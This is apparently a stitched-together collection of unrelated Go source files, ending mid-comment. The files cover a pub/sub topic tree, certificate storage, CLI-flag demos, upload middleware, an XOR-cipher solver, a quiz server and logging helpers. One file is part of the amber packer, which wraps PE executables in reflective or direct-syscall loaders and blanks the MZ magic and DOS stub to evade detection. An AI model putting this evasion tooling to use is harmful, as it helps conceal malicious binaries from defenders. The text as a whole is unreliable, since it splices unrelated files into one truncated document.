// TopicConf holds the marker bytes recognized in topic keys and the
// factory used to create a fan-out distribution for a node.
type TopicConf struct {
	SingleWc byte // single-level wildcard marker — presumably '+' style; confirm
	MultiWc  byte // multi-level wildcard marker — presumably '#' style; confirm
	Sys      byte // system-topic marker; not referenced in this chunk
	Dist     func() distribution.Distribution // factory for a node's fan-out
}

// TopicNode is one level of the topic tree. Each node owns its direct
// subscribers plus a separate set of multi-level wildcard subscribers.
type TopicNode struct {
	id              byte // the key byte this node represents
	Conf            *TopicConf
	SubscriberKeys  map[string]bool // ids attached directly at this node
	WSubscriberKeys map[string]bool // ids attached via multi-level wildcard
	subscribers     distribution.Distribution // direct fan-out (lazily created)
	wsubscribers    distribution.Distribution // wildcard fan-out (lazily created)
	children        map[byte]*TopicNode // next tree level, keyed by topic byte
	mu              sync.Mutex // guards children mutation in Subscribe
}
// Publish delivers data to every subscriber at the node that key
// resolves to, and to the multi-level wildcard subscribers registered
// at this node. key[0] addresses this node; key[1] selects the child.
//
// Fix: the previous version allocated an empty children map on every
// publish to a non-existent subtree (a pure waste — a nil map lookup
// is valid in Go) and carried a redundant trailing return.
//
// NOTE(review): children is read here without holding n.mu while
// Subscribe mutates it under the lock — concurrent publish/subscribe
// looks racy; confirm the intended locking discipline.
func (n *TopicNode) Publish(key []byte, data []byte) {
	// Multi-level wildcard subscribers receive everything below this node.
	if n.wsubscribers != nil {
		n.wsubscribers.Write(data)
	}
	// Key exhausted: this node is the destination.
	if len(key) == 1 {
		if n.subscribers != nil {
			n.subscribers.Write(data)
		}
		return
	}
	// Descend only if the child already exists; publishing must never
	// create topic nodes.
	if child, ok := n.children[key[1]]; ok {
		child.Publish(key[1:], data)
	}
}
// Subscribe registers writer s under subscriber id at the node that key
// resolves to. key[0] addresses this node; key[1] selects the child or
// names a wildcard. Missing children are created on demand.
func (n *TopicNode) Subscribe(key []byte, id string, s io.Writer) {
	// Key exhausted: attach directly to this node.
	if len(key) == 1 {
		if n.subscribers == nil {
			n.subscribers = n.Conf.Dist()
		}
		if n.SubscriberKeys == nil {
			n.SubscriberKeys = make(map[string]bool)
		}
		// Dedup-by-id was tried and disabled: duplicate subscribes
		// currently attach the writer twice.
		//if !n.SubscriberKeys[id] {
		n.subscribers.Attach(s)
		n.SubscriberKeys[id] = true
		//}
		return
	}
	// Multi-level wildcard: attach to this node's wildcard fan-out.
	// NOTE(review): this branch does not return — unless MultiWc equals
	// SingleWc, execution falls through and ALSO creates a child node
	// keyed by the wildcard byte below. Confirm whether that is intended.
	if key[1] == n.Conf.MultiWc {
		if n.wsubscribers == nil {
			n.wsubscribers = n.Conf.Dist()
		}
		if n.WSubscriberKeys == nil {
			n.WSubscriberKeys = make(map[string]bool)
		}
		//if !n.WSubscriberKeys[id] {
		n.wsubscribers.Attach(s)
		n.WSubscriberKeys[id] = true
		//}
	}
	// Single-level wildcard: fan the subscription out to every existing
	// child (children created later will NOT see it).
	if key[1] == n.Conf.SingleWc {
		key = key[2:]
		n.mu.Lock()
		defer n.mu.Unlock()
		for _, v := range n.children {
			v.Subscribe(key, id, s)
		}
		return
	}
	// Literal byte: create the child if needed (under the lock), then
	// recurse. NOTE(review): the map is re-read after Unlock — racy if
	// a concurrent writer could remove entries.
	n.mu.Lock()
	if n.children == nil {
		n.children = make(map[byte]*TopicNode)
	}
	if _, ok := n.children[key[1]]; !ok {
		n.children[key[1]] = &TopicNode{id: key[1], Conf: n.Conf}
	}
	n.mu.Unlock()
	n.children[key[1]].Subscribe(key[1:], id, s)
}
// UnSubscribe removes subscriber id below key.
// NOTE(review): not implemented — subscriptions are never released.
func (n *TopicNode) UnSubscribe(key []byte, id string) {
	// Do nothing for now.
}
|
package allmulti
import (
"context"
"crypto/tls"
)
// IsPushCertStale answers from the first (primary) store and fans the
// call out to the remaining stores, logging — but otherwise ignoring —
// any errors they return.
func (ms *MultiAllStorage) IsPushCertStale(ctx context.Context, topic string, staleToken string) (bool, error) {
	stale, err := ms.stores[0].IsPushCertStale(ctx, topic, staleToken)
	for i, store := range ms.stores[1:] {
		if _, sErr := store.IsPushCertStale(ctx, topic, staleToken); sErr != nil {
			ms.logger.Info("method", "IsPushCertStale", "storage", i+1, "err", sErr)
		}
	}
	return stale, err
}
// RetrievePushCert returns the primary store's certificate and stale
// token; the remaining stores are queried only so their errors get
// logged.
func (ms *MultiAllStorage) RetrievePushCert(ctx context.Context, topic string) (cert *tls.Certificate, staleToken string, err error) {
	primaryCert, primaryToken, primaryErr := ms.stores[0].RetrievePushCert(ctx, topic)
	for i, store := range ms.stores[1:] {
		if _, _, sErr := store.RetrievePushCert(ctx, topic); sErr != nil {
			ms.logger.Info("method", "RetrievePushCert", "storage", i+1, "err", sErr)
		}
	}
	return primaryCert, primaryToken, primaryErr
}
// StorePushCert writes the push certificate to every store; only the
// primary store's error is returned, the rest are logged.
func (ms *MultiAllStorage) StorePushCert(ctx context.Context, pemCert, pemKey []byte) error {
	primaryErr := ms.stores[0].StorePushCert(ctx, pemCert, pemKey)
	for i, store := range ms.stores[1:] {
		if sErr := store.StorePushCert(ctx, pemCert, pemKey); sErr != nil {
			ms.logger.Info("method", "StorePushCert", "storage", i+1, "err", sErr)
		}
	}
	return primaryErr
}
|
package day02
import (
"flag"
"fmt"
"os"
)
/*
疑问:
1.为什么demo03中函数第二个参数和demo02中同名会报错: flag redefined
Note:
1.os.Args持有命令行参数
2.flag包实现命令行标记解析
1.命令行标记格式: -flag
*/
// CommandLineArgs runs the command-line-argument demos. demo02 is
// disabled: per the file's header note, it registers the same flag
// names as demo03, and registering a flag twice panics with
// "flag redefined".
func CommandLineArgs() {
	demo01()
	//demo02()
	demo03()
}
// demo01 dumps the raw command line arguments held in os.Args.
func demo01() {
	// Test data: name 杨一帆 age 21 gender male
	fmt.Println("------方式一: os.Args------")
	fmt.Println(os.Args)
	for idx, arg := range os.Args {
		fmt.Println(idx, arg)
	}
}
// demo02 parses command line flags through the pointers returned by
// flag.String / flag.Int, then prints each pointer, its value type and
// the value.
func demo02() {
	// Test data: -name 杨一帆 -age 21 -gender male
	fmt.Println("------方式二: flag包------")
	name := flag.String("name", "无名氏", "姓名")
	age := flag.Int("age", 0, "年龄")
	gender := flag.String("gender", "male", "性别")
	flag.Parse() // parses the command line from os.Args[1:]
	fmt.Printf("%p, %T, %s\n", name, *name, *name)
	fmt.Printf("%p, %T, %d\n", age, *age, *age)
	fmt.Printf("%p, %T, %s\n", gender, *gender, *gender)
}
// demo03 binds command line flags to pre-declared variables with
// flag.StringVar / flag.IntVar, then prints each address, type and
// value.
func demo03() {
	// Test data: -name 杨一帆 -age 21 -gender male
	fmt.Println("------方式三: flag包------")
	var (
		name   string
		age    int
		gender string
	)
	flag.StringVar(&name, "name", "无名氏", "姓名")
	flag.IntVar(&age, "age", 0, "年龄")
	flag.StringVar(&gender, "gender", "male", "性别")
	flag.Parse()
	fmt.Printf("%p, %T, %s\n", &name, name, name)
	fmt.Printf("%p, %T, %d\n", &age, age, age)
	fmt.Printf("%p, %T, %s\n", &gender, gender, gender)
}
|
// Copyright 2014 The Sporting Exchange Limited. All rights reserved.
// Use of this source code is governed by a free license that can be
// found in the LICENSE file.
package collect
import (
"opentsp.org/contrib/collect-netscaler/nitro"
)
// init registers the "protocolhttp" stat group with the collector.
func init() {
	registerStatFunc("protocolhttp", protocolHTTP)
}
// protocolHTTP emits HTTP and SPDY protocol counters from a NetScaler
// nitro stat response. Note the HTTP fields are pointers (dereferenced
// here — a nil field would panic) while the SPDY fields are passed
// through as-is.
func protocolHTTP(emit emitFn, r *nitro.ResponseStat) {
	x := r.ProtocolHTTP
	emit("protocol.http.request.bytes", *x.HTTPTotRxRequestBytes)
	emit("protocol.http.request.errors type=HeaderTooLong", *x.HTTPErrIncompleteRequests)
	emit("protocol.http.request.received type=GET", *x.HTTPTotGets)
	emit("protocol.http.request.received type=Other", *x.HTTPTotOthers)
	emit("protocol.http.request.received type=POST", *x.HTTPTotPosts)
	emit("protocol.http.response.bytes", *x.HTTPTotTxResponseBytes)
	emit("protocol.http.response.errors type=5yz", *x.HTTPErrServerBusy)
	emit("protocol.http.response.errors type=HeaderTooLong", *x.HTTPErrIncompleteResponses)
	emit("protocol.http.response.sent", *x.HTTPTotResponses)
	emit("protocol.spdy.streams.total", x.SPDYTotStreams)
	emit("protocol.spdy.streams.byversion v=2", x.SPDYv2TotStreams)
	emit("protocol.spdy.streams.byversion v=3", x.SPDYv3TotStreams)
}
|
// Copyright (c) 2014 James Wendel. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package main
import (
"bitbucket.org/kyrra/sandbox/webapi/auth"
"flag"
"fmt"
)
// main parses server configuration from command line flags and starts
// the auth HTTP server, reporting any startup error on stdout.
func main() {
	var (
		listen       = flag.String("listen", ":8080", "Hostname and address to listen on")
		source       = flag.String("datasource", "domains.json", "Filename to load JSON user data from")
		tokenFile    = flag.String("tokensource", "", "Filename to save and load access_tokens from. Blank to bypass this feature.")
		tokenTimeout = flag.Int("tokenTimeout", 3600, "Lifetime of auth tokens in seconds")
	)
	flag.Parse()
	if err := auth.Serve(*listen, *source, *tokenFile, *tokenTimeout); err != nil {
		fmt.Println("error starting auth server: ", err)
	}
}
|
package fileupload
import (
	"context"
	"errors"
	"io"
	"io/ioutil"
	"net/http"

	"github.com/alejogs4/blog/src/post/domain/post"
	"github.com/alejogs4/blog/src/shared/infraestructure/httputils"
	"github.com/alejogs4/blog/src/shared/infraestructure/middleware"
)
// errCopyingFile is returned for any failure while storing the upload.
var errCopyingFile = errors.New("File: file must be present")

// uploadFile extracts the multipart file in formField from request,
// stores it as a fresh temp file ("upload-*.jpeg") inside folder and
// returns the stored file's path prefixed with "/".
//
// Fixes: the destination file is now closed (it was leaked on every
// upload), and the content is streamed with io.Copy instead of being
// buffered fully in memory via ioutil.ReadAll.
func uploadFile(request *http.Request, formField, folder string) (string, error) {
	file, _, err := request.FormFile(formField)
	if err != nil {
		return "", post.ErrMissingPostPicture
	}
	defer file.Close()
	newFile, err := ioutil.TempFile(folder, "upload-*.jpeg")
	if err != nil {
		return "", errCopyingFile
	}
	defer newFile.Close()
	if _, err = io.Copy(newFile, file); err != nil {
		return "", errCopyingFile
	}
	return "/" + newFile.Name(), nil
}
// UploadFile returns middleware that stores an incoming multipart file
// (form field formField) into the existing folder before invoking the
// wrapped handler. On success the stored path is exposed to the handler
// via the request context under the "file" key; on failure a JSON error
// is dispatched and the handler is not called.
func UploadFile(formField, folder string) middleware.Middleware {
	return func(f http.HandlerFunc) http.HandlerFunc {
		return func(response http.ResponseWriter, request *http.Request) {
			response.Header().Set("Content-Type", "application/json")
			filePath, err := uploadFile(request, formField, folder)
			if err != nil {
				httpError := mapFileErrorToHttpError(err)
				httputils.DispatchNewHttpError(response, httpError.Message, httpError.Status)
				return
			}
			// NOTE(review): a bare string context key collides easily;
			// a private typed key would be safer.
			newContext := context.WithValue(request.Context(), "file", filePath) //nolint
			f(response, request.WithContext(newContext))
		}
	}
}
|
package main
import (
"bufio"
"encoding/hex"
"fmt"
"os"
"strings"
)
// decodeBytes decodes a hex string into raw bytes, panicking on
// malformed input (acceptable in this one-off exercise script).
func decodeBytes(src string) []byte {
	decoded, err := hex.DecodeString(src)
	if err != nil {
		panic(err)
	}
	return decoded
}
// xorByVal returns a fresh slice holding bs with every byte XOR-ed
// against b; the input is left untouched.
func xorByVal(bs []byte, b byte) []byte {
	out := make([]byte, len(bs))
	for i := range bs {
		out[i] = bs[i] ^ b
	}
	return out
}
// englishLetterFrequency scores how closely input resembles English
// text: characters outside A-Z/a-z and a small punctuation set lower
// the score, and per-letter counts are compared against a reference
// English letter-frequency table.
// Frequencies via http://en.algoritmy.net/article/40379/Letter-frequency-English
func englishLetterFrequency(input string) float32 {
	englishFreq := []float32{
		0.08167, 0.01492, 0.02782, 0.04253, 0.12702, 0.02228, 0.02015, // A-G
		0.06094, 0.06966, 0.00153, 0.00772, 0.04025, 0.02406, 0.06749, // H-N
		0.07507, 0.01929, 0.00095, 0.05987, 0.06327, 0.09056, 0.02758, // O-U
		0.00978, 0.02360, 0.00150, 0.01974, 0.00074, // V-Z
	}
	var counts [26]int
	var skipped, bad int
	for _, r := range input {
		switch {
		case r >= 'A' && r <= 'Z':
			counts[r-'A']++
		case r >= 'a' && r <= 'z':
			counts[r-'a']++
		case strings.ContainsRune("\"'`´ .,:;", r):
			skipped++ // common punctuation: neither reward nor penalty
		default:
			bad++ // anything else counts against the score
		}
	}
	score := float32(1) - float32(bad)/float32(len(input))
	letters := float32(len(input) - skipped)
	for i := 0; i < 26; i++ {
		score += float32(counts[i])/letters - englishFreq[i]
	}
	return score
}
func GuessXoredValue(input []byte) (rune, float32, string) {
var bestFrequ float32
var bestRune rune
for r := rune(1); r < 128; r++ {
test := string(xorByVal(input, byte(r)))
if frequ := englishLetterFrequency(test); frequ > bestFrequ {
bestFrequ = frequ
bestRune = r
}
}
return bestRune, bestFrequ, string(xorByVal(input, byte(bestRune)))
}
// main scans sentences.txt (one hex-encoded line per row), guesses the
// XOR key for every line, and prints only the single best-scoring guess.
func main() {
	file, err := os.Open("sentences.txt")
	if err != nil {
		panic(err)
	}
	defer file.Close()
	scanner := bufio.NewScanner(file)
	var (
		best    []interface{}
		bestFit float32
		line    = 1
	)
	for scanner.Scan() {
		key, fit, decoded := GuessXoredValue(decodeBytes(scanner.Text()))
		if fit > bestFit {
			best = []interface{}{"Guessing line", line, "XOR char", string(key), "hit rate", fit, "decoded:", decoded}
			bestFit = fit
		}
		line++
	}
	if scanErr := scanner.Err(); scanErr != nil {
		panic(scanErr)
	}
	fmt.Println(best...)
}
|
package main
import (
"fmt"
"net/http"
"log"
"encoding/json"
"strconv"
)
// Question is a single quiz question: a prompt plus its answer choices.
type Question struct {
	Description string `json:"description"`
	ChoiceList []string `json:"choice_list"`
}

// QuestionProvider holds the loaded question list and serves it over
// HTTP (it implements http.Handler below).
type QuestionProvider struct {
	QuestionList []Question `json:"question_list"`
}
// InitFromFile populates the provider's question list.
// NOTE(review): despite the name, path is currently unused — questions
// come from this hard-coded JSON literal, and the Unmarshal error is
// deliberately discarded.
func (qp *QuestionProvider) InitFromFile (path string) {
	question_list := `{"question_list":[{"description":"abcde?","choice_list":["A. g","B. f","C. k","D. z"]},
{"description":"1 + 1 = ?","choice_list":["A. 2","B. 3","C. 4","D. 5"]},
{"description":"1 + 2 = ?","choice_list":["A. -99","B. jkl","C. e","D. 3"]}
]}`
	_ = json.Unmarshal([]byte(question_list), &qp)
	return
}
// ServeHTTP implements http.Handler. It expects a "question_id" form
// value and replies with the addressed question's description and
// choices, or an error message for a missing/invalid id.
//
// Fix: the id is now also checked to be non-negative — previously a
// request like question_id=-1 passed the upper-bound check and
// panicked when indexing the slice.
func (qp QuestionProvider) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	r.ParseForm() // parse query/form parameters
	questionID := r.Form["question_id"]
	if questionID == nil {
		fmt.Fprintf(w, "Error on question_id")
		return
	}
	qid, err := strconv.Atoi(questionID[0])
	if err != nil || qid < 0 || qid >= len(qp.QuestionList) {
		fmt.Fprintf(w, "Wrong question_id")
		return
	}
	fmt.Fprintf(w, "Question description: %s\n", qp.QuestionList[qid].Description)
	for _, choice := range qp.QuestionList[qid].ChoiceList {
		fmt.Fprintf(w, "%s\n", choice)
	}
}
// main loads the built-in questions and serves them on :23333.
func main() {
	provider := &QuestionProvider{}
	provider.InitFromFile("path-to-read")
	if err := http.ListenAndServe(":23333", provider); err != nil {
		log.Fatal("ListenAndServe: ", err)
	}
}
|
package client
import (
	"encoding/json"
	"io/ioutil"
	"net/http"
	"strings"
)
// post sends data as a multipart/form-data POST to url and decodes the
// JSON response into a generic map.
//
// Fixes: the file did not import encoding/json although json.Unmarshal
// was called (compile error — import added at the top of the file);
// request-creation and transport errors are now returned instead of
// being discarded (a failed Do left res nil and panicked on
// res.Body.Close); a JSON decode failure is now reported too.
func post(url string, data map[string]string) (map[string]interface{}, error) {
	payload := strings.NewReader(makeFormData(data, "boundaryhere"))
	req, err := http.NewRequest("POST", url, payload)
	if err != nil {
		return map[string]interface{}{}, err
	}
	req.Header.Add("content-type", "multipart/form-data; boundary=boundaryhere")
	res, err := http.DefaultClient.Do(req)
	if err != nil {
		return map[string]interface{}{}, err
	}
	defer res.Body.Close()
	body, err := ioutil.ReadAll(res.Body)
	if err != nil {
		return map[string]interface{}{}, err
	}
	var bodyJson map[string]interface{}
	if err := json.Unmarshal(body, &bodyJson); err != nil {
		return map[string]interface{}{}, err
	}
	return bodyJson, nil
}
// makeFormData renders data as a multipart/form-data body delimited by
// the given boundary string. Field order follows Go's (random) map
// iteration order.
func makeFormData(data map[string]string, boundary string) string {
	var b strings.Builder
	for field, value := range data {
		b.WriteString("--" + boundary + "\r\n" + `Content-Disposition: form-data; name="` + field + `"` + "\r\n\r\n" + value + "\r\n")
	}
	b.WriteString("--" + boundary + "--")
	return b.String()
}
package internal
import (
"fmt"
"io"
"os"
"time"
)
// Log writes a timestamped, formatted message to stdout.
//
// Fix: the variadic args are now forwarded with args... — previously
// the []interface{} slice was passed as a single operand, so a call
// like Log("%s %d", "x", 1) printed the whole slice for the first verb
// and reported missing operands for the rest. The nil-check branching
// was redundant: spreading an empty slice is a no-op.
func Log(format string, args ...interface{}) {
	fLog(os.Stdout, format, args...)
}
// LogErr writes a timestamped, formatted message prefixed with
// "ERROR: " to stderr.
//
// Fix: args are forwarded with args... — previously the slice was
// passed as one operand, corrupting the formatted output (same defect
// as Log).
func LogErr(format string, args ...interface{}) {
	fLog(os.Stderr, "ERROR: "+format, args...)
}
// fLog writes one line to out: an RFC3339 timestamp, ": ", then the
// formatted message and a trailing newline.
func fLog(out io.Writer, format string, args ...interface{}) {
	now := time.Now()
	fmt.Fprintf(out, now.Format(time.RFC3339)+": "+format+"\n", args...)
}
|
package main
import (
rl "rules"
ac "actions"
)
// Monitor evaluates parsed log events against a rule set and fires the
// configured actions for matching rules.
type Monitor struct {
	d_rules []rl.Rule // rules checked against every event
	d_actions []ac.Action // actions fired for each matching rule
}
// Init loads all configured actions and rules into the monitor.
func (m*Monitor)Init(){
	m.d_actions = ac.InitAllActions()
	m.d_rules = rl.InitAllRules()
}
// MparseLine parses a raw log line into an event, checks every rule
// against it and, for each rule that yields targets, runs all actions
// on those targets. Returns "" on success or an error description.
func (m *Monitor) MparseLine(line string) string {
	event, ok := ParseLine(line)
	if !ok {
		return "Parse line failed"
	}
	for _, rule := range m.d_rules {
		targets := rule.CheckEvent(&event)
		if len(targets) == 0 {
			continue
		}
		for _, action := range m.d_actions {
			action.TakeAction(targets)
		}
	}
	return ""
}
|
package amber
import (
"bytes"
"encoding/binary"
"errors"
"path/filepath"
"github.com/EgeBalci/amber/utils"
pe "github.com/EgeBalci/debug/pe"
)
const (
	// PE_DOS_STUB is the telltale DOS stub message present in ordinary PE files.
	PE_DOS_STUB = "This program cannot be run in DOS mode"
)

var (
	ErrUnsupportedArch  = errors.New("unsupported PE file architecture")
	ErrInvalidPeSpecs   = errors.New("unsupported PE file specs")
	ErrInvalidPeHeaders = errors.New("invalid PE headers")
)

// PE ("blueprint") bundles the parsed PE file, the header values the
// tool cares about, and the options that control loader assembly.
type PE struct {
	Name string // file name as given to Open
	FullName string // absolute path
	FileSize int
	// Tool options.
	IAT bool
	Resource bool
	IgnoreIntegrity bool
	IatResolver bool // swap CRC API hashing stubs for IAT-based resolution (see AssembleLoader)
	SyscallLoader bool // use the direct-syscall loader; 64-bit only (see AssembleLoader)
	ScrapeHeaders bool // blank MZ magic and DOS stub before packing (see ScrapePeHeaders)
	// PE specs...
	Architecture int // 32 or 64, from the file header machine type
	SizeOfImage uint32
	ImageBase uint64
	AddressOfEntry uint32
	Subsystem uint16
	ImportTable uint64 // VA of the import directory
	ExportTable uint64 // VA of the export directory
	RelocTable uint64 // VA of the base relocation directory
	ImportAdressTable uint64 // VA of the IAT (field name sic — kept for compatibility)
	HasBoundedImports bool
	HasDelayedImports bool
	HasTLSCallbacks bool // never set in this chunk — TODO confirm where it is populated
	HasRelocData bool
	IsCLR bool // .NET/CLR image (COM descriptor directory non-empty)
	IsDLL bool
	// PE File
	file *pe.File
}
// Open parses the PE file at fileName and fills a blueprint with its
// architecture, optional-header values and data-directory-derived
// flags. Returns ErrUnsupportedArch for machines other than i386/amd64.
func Open(fileName string) (bp *PE, err error) {
	bp = new(PE)
	bp.Name = fileName
	bp.FullName, err = filepath.Abs(fileName)
	if err != nil {
		return
	}
	bp.file, err = pe.Open(bp.FullName)
	if err != nil {
		return
	}
	switch bp.file.FileHeader.Machine {
	case pe.IMAGE_FILE_MACHINE_I386:
		bp.Architecture = 32
	case pe.IMAGE_FILE_MACHINE_AMD64:
		bp.Architecture = 64
	default:
		return nil, ErrUnsupportedArch
	}
	// Fetch OptionalHeader values to blueprint. Data-directory indices
	// used below follow the PE/COFF spec: 0=export, 1=import,
	// 5=base reloc, 11=bound import, 12=IAT, 13=delay import,
	// 14=CLR descriptor.
	switch hdr := (bp.file.OptionalHeader).(type) {
	case *pe.OptionalHeader32:
		// cast those back to a uint32 before use in 32bit
		bp.ImageBase = uint64(hdr.ImageBase)
		bp.Subsystem = hdr.Subsystem
		bp.SizeOfImage = hdr.SizeOfImage
		// Bit-set test written as x == (x | flag).
		bp.IsDLL = bp.file.Characteristics == (bp.file.Characteristics | pe.IMAGE_FILE_DLL)
		bp.HasRelocData = hdr.DataDirectory[5].Size != 0x00
		bp.HasBoundedImports = hdr.DataDirectory[11].Size != 0x00
		bp.HasDelayedImports = hdr.DataDirectory[13].Size != 0x00
		bp.IsCLR = hdr.DataDirectory[14].Size != 0x00
		// Directory RVAs rebased to virtual addresses.
		bp.ExportTable = uint64(hdr.DataDirectory[0].VirtualAddress + uint32(hdr.ImageBase))
		bp.ImportTable = uint64(hdr.DataDirectory[1].VirtualAddress + uint32(hdr.ImageBase))
		bp.RelocTable = uint64(hdr.DataDirectory[5].VirtualAddress + uint32(hdr.ImageBase))
		bp.ImportAdressTable = uint64(hdr.DataDirectory[12].VirtualAddress + uint32(hdr.ImageBase))
	case *pe.OptionalHeader64:
		bp.ImageBase = hdr.ImageBase
		bp.Subsystem = hdr.Subsystem
		bp.SizeOfImage = hdr.SizeOfImage
		bp.IsDLL = bp.file.Characteristics == (bp.file.Characteristics | pe.IMAGE_FILE_DLL)
		bp.HasRelocData = hdr.DataDirectory[5].Size != 0x00
		bp.HasBoundedImports = hdr.DataDirectory[11].Size != 0x00
		bp.HasDelayedImports = hdr.DataDirectory[13].Size != 0x00
		bp.IsCLR = hdr.DataDirectory[14].Size != 0x00
		// NOTE(review): the 64-bit branch also truncates ImageBase to
		// uint32 when rebasing — confirm this is intended for images
		// based above 4 GiB.
		bp.ExportTable = uint64(hdr.DataDirectory[0].VirtualAddress + uint32(hdr.ImageBase))
		bp.ImportTable = uint64(hdr.DataDirectory[1].VirtualAddress + uint32(hdr.ImageBase))
		bp.RelocTable = uint64(hdr.DataDirectory[5].VirtualAddress + uint32(hdr.ImageBase))
		bp.ImportAdressTable = uint64(hdr.DataDirectory[12].VirtualAddress + uint32(hdr.ImageBase))
	}
	bp.FileSize, err = utils.GetFileSize(bp.FullName)
	return
}
// AssembleLoader builds the final self-loading payload: the (optionally
// header-scraped) raw PE image, prefixed with a call-over stub, then
// the pre-assembled reflective loader that matches the architecture and
// the configured options.
func (pe *PE) AssembleLoader() ([]byte, error) {
	var (
		rawFile = pe.file.RawBytes
		err     error
	)
	// Optionally blank MZ magic / DOS stub first.
	if pe.ScrapeHeaders {
		rawFile, err = pe.ScrapePeHeaders()
		if err != nil {
			return nil, err
		}
	}
	// Add a call over the given binary
	payload, err := pe.AddCallOver(rawFile)
	if err != nil {
		return nil, err
	}
	// Decide on the architecture, API block, and loader types...
	// we have 3 pre-assembled loaders for public version of amber.
	switch pe.Architecture {
	case 32:
		if pe.SyscallLoader {
			return nil, errors.New("syscall loader only supports 64 bit PE files")
		}
		payload = append(payload, LOADER_32...)
	case 64:
		if pe.SyscallLoader {
			payload = append(payload, SYSCALL_LOADER_64...)
		} else {
			payload = append(payload, LOADER_64...)
		}
	default:
		return nil, ErrUnsupportedArch
	}
	// Optionally swap the CRC-hash API stubs for the IAT-based resolver.
	if pe.IatResolver {
		if pe.SyscallLoader {
			return nil, errors.New("cannot use IAT resolver with syscall loader")
		}
		switch pe.Architecture {
		case 32:
			payload = bytes.ReplaceAll(payload, CRC_API_32, IAT_API_32)
		case 64:
			payload = bytes.ReplaceAll(payload, CRC_API_64, IAT_API_64)
		}
	}
	return payload, nil
}
// AddCallOver prepends a CALL instruction (0xE8 + little-endian rel32
// equal to the payload length) so execution jumps over the payload and
// the payload's start address is left on the stack for the loader.
func (pe *PE) AddCallOver(payload []byte) ([]byte, error) {
	rel := new(bytes.Buffer)
	if err := binary.Write(rel, binary.LittleEndian, uint32(len(payload))); err != nil {
		return nil, err
	}
	out := append([]byte{0xe8}, rel.Bytes()...)
	return append(out, payload...), nil
}
// ScrapePeHeaders returns the raw PE image with telltale header
// artifacts removed: the "MZ" magic bytes are zeroed and the DOS stub
// message is blanked out.
//
// Fix: the DOS-stub check was inverted — the function returned
// ErrInvalidPeHeaders precisely when the stub WAS present, which made
// the bytes.Replace below unreachable for any normal PE file. It now
// errors when the stub is missing, mirroring the MZ-magic check above.
func (pe *PE) ScrapePeHeaders() ([]byte, error) {
	rawFile, err := pe.file.Bytes()
	if err != nil {
		return nil, err
	}
	// Zero the MZ magic bytes...
	if rawFile[0] == 'M' &&
		rawFile[1] == 'Z' {
		rawFile[0] = 0x00
		rawFile[1] = 0x00
	} else {
		return nil, ErrInvalidPeHeaders
	}
	// Blank the DOS stub message...
	if !bytes.Contains(rawFile, []byte(PE_DOS_STUB)) {
		return nil, ErrInvalidPeHeaders
	}
	return bytes.Replace(rawFile, []byte(PE_DOS_STUB), make([]byte, len(PE_DOS_STUB)), 1), nil
}
|
package main
import (
"encoding/json"
"github.com/stretchr/testify/assert"
"testing"
)
// TestModelsCanBeConvertedToProperJson pins the Score model's JSON
// field names and ordering.
func TestModelsCanBeConvertedToProperJson(t *testing.T) {
	score := &Score{
		Drink:  "beer",
		Rolled: 2,
	}
	body, err := json.Marshal(score)
	assert.Nil(t, err)
	assert.Equal(t, string(body), "{\"drink\":\"beer\",\"rolled\":2}")
}
// TestErrorModel pins the ErrorModel's JSON field names and values.
func TestErrorModel(t *testing.T) {
	notFound := &ErrorModel{
		Message:    "Could not find combination of user: joeri list: joeri",
		UniqueCode: "someuuid",
	}
	body, err := json.Marshal(notFound)
	assert.Nil(t, err)
	assert.Equal(t, string(body), "{\"errorMessage\":\"Could not find combination of user: joeri list: joeri\",\"uniqueCode\":\"someuuid\"}")
}
|
package goracle
// Version is the released version string of this driver.
const Version = "v2.1.20"
|
package backend_service
import (
"2021/yunsongcailu/yunsong_server/backend/backend_dao"
"2021/yunsongcailu/yunsong_server/backend/backend_model"
)
// BackendCategoryServer exposes CRUD operations over menu categories.
type BackendCategoryServer interface {
	// GetCategories returns every category.
	GetCategories() (categories []backend_model.BackendCategoryModel,err error)
	// AddCategory creates a new category.
	AddCategory(category backend_model.BackendCategoryModel) (err error)
	// EditCategory updates an existing category.
	EditCategory(category backend_model.BackendCategoryModel) (err error)
	// RemoveCategory deletes the category with the given id.
	RemoveCategory(categoryId int64) (err error)
	// GetCategoriesByMenuId returns the categories under the given menu.
	GetCategoriesByMenuId(menuId int64) (categories []backend_model.BackendCategoryModel,err error)
}
// backendCategoryServer is the default BackendCategoryServer, a thin
// delegation layer over the category DAO.
type backendCategoryServer struct {}

// NewBackendCategoryServer returns the default category service.
func NewBackendCategoryServer() BackendCategoryServer {
	return &backendCategoryServer{}
}

// bcd is the shared category data-access object used by every method.
var bcd = backend_dao.NewBackendCategoryDao()

// GetCategories returns every category.
func(bcs *backendCategoryServer) GetCategories() (categories []backend_model.BackendCategoryModel,err error) {
	return bcd.FindCategories()
}

// AddCategory creates a new category.
func(bcs *backendCategoryServer) AddCategory(category backend_model.BackendCategoryModel) (err error) {
	return bcd.InsertCategory(category)
}

// EditCategory updates an existing category.
func(bcs *backendCategoryServer) EditCategory(category backend_model.BackendCategoryModel) (err error) {
	return bcd.UpdateCategory(category)
}

// RemoveCategory deletes the category with the given id.
func(bcs *backendCategoryServer) RemoveCategory(categoryId int64) (err error) {
	return bcd.DeleteCategory(categoryId)
}

// GetCategoriesByMenuId returns the categories under the given menu.
func(bcs *backendCategoryServer) GetCategoriesByMenuId(menuId int64) (categories []backend_model.BackendCategoryModel,err error) {
	return bcd.FindCategoriesByMenuId(menuId)
}
package dynamic_programming
import "testing"
// Test_maxProfit checks maxProfit2 against the classic example: buy at
// 1, sell at 6, profit 5.
func Test_maxProfit(t *testing.T) {
	got := maxProfit2([]int{7, 1, 5, 3, 6, 4})
	if got != 5 {
		t.Error(got)
	}
}
|
package balancetests
import (
"bufio"
"fmt"
"os"
"sort"
"testing"
)
// Nodes is the number of simulated nodes keys are balanced across.
const Nodes = 4

var (
	filePath string = "./words.txt" // word list: one key per line
	nodeList = make([]string, Nodes)
)

// init names the nodes and initializes every balancing method under test.
func init() {
	for n := range nodeList {
		nodeList[n] = fmt.Sprintf("node-%d", n)
	}
	chInit()
	fnv1modInit()
	vaporchInit()
}
// method pairs a balancing method's display name with its key-to-node
// mapping function.
type method struct {
	name string
	f func(string) string
}

// methods is populated by the per-method init helpers (chInit etc.).
var methods []method
// Words via https://raw.githubusercontent.com/dwyl/english-words/master/words.txt.
// TestBalance runs every registered balancing method over the word
// list, counts keys per node and reports imbalance statistics.
//
// Fixes: the words file is now closed after each method's pass (it was
